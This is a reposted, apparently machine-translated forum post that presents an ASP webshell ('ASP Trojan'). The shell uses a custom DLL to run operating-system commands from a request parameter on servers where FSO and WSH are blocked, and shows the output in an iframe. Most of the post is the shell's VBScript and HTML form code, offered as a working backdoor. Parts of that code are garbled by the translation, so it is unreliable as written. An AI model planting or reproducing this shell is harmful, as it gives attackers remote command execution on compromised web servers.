ASP Trojan without FSO and WSH

xiaoxiao2021-03-06 38

The interface is very simple, almost similar to the ancient cmd.asp. Just do something that throws the jade

After writing, I have been happy ~~ Sicily ~ use VB's shell function!

In fact, this thing is the only advantage that the FSO and WSH are prohibited from being banned on the machine.

The principle is to generate a DLL object, then use ASP to call the Exec function in this object so that you can get the command. Then execute the output to the zz.txt in the directory where the web is located, the page is read with iframe ~~ But you need to manually refresh, after all, the shell is executed as asynchronous. . . .

PS: Kevinz.dll needs to be placed with shell.asp to use or put the shell.asp in the system32 directory.

code show as below:

Dim shell

Set shell = server.createObject ("kevinz.exec")

PATH = Server.mappath (".")

response.write " Now system Path is:

" & path & "

IF not Request ("cmd") = "" "" "

CMD = Request ("cmd")

CMD = Replace (cmd, "^", "^^")

CMD = Replace (cmd, ">", "^>")

CMD = Replace (cmd, "<", "^ <")

CMD = Replace (cmd, "&", "^ &")

Shell.exec cmd, Path

response.write "
Command:" "" & cmd & "" "
Command successfully executed
"

Else

CMD = "VER"

END IF

Set test = Nothing

kevin1986's she11 aspd00r </ title></p> <p></ hEAD></p> <p><form name = "kevinz" action = "shell.asp"></p> <p><Input Type = "text" name = "cmd" value = <% = cmd%> size = 60></p> <p><Input Type = "Submit" Value = "EXE (U E (0mm4nd"></p> <p><br></p> <p><iframe height = 60% width = 80% src = "zz.txt" Name = "result"> </ iframe> <br></p> <p><font size = 2> <a href=javascript:History.go (0) target="Result"> View execution result </a> </ font> </ body></p> <p></ html></p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-76539.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="76539" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.034</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'zs5r3xdAEpUxMMuOkr0L0XhIdxsycqydBbHHx0Mpz2WVg3qtqQFYOpzx3P6QpSlTBRysrMXL85JljWiK48gjiQ_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>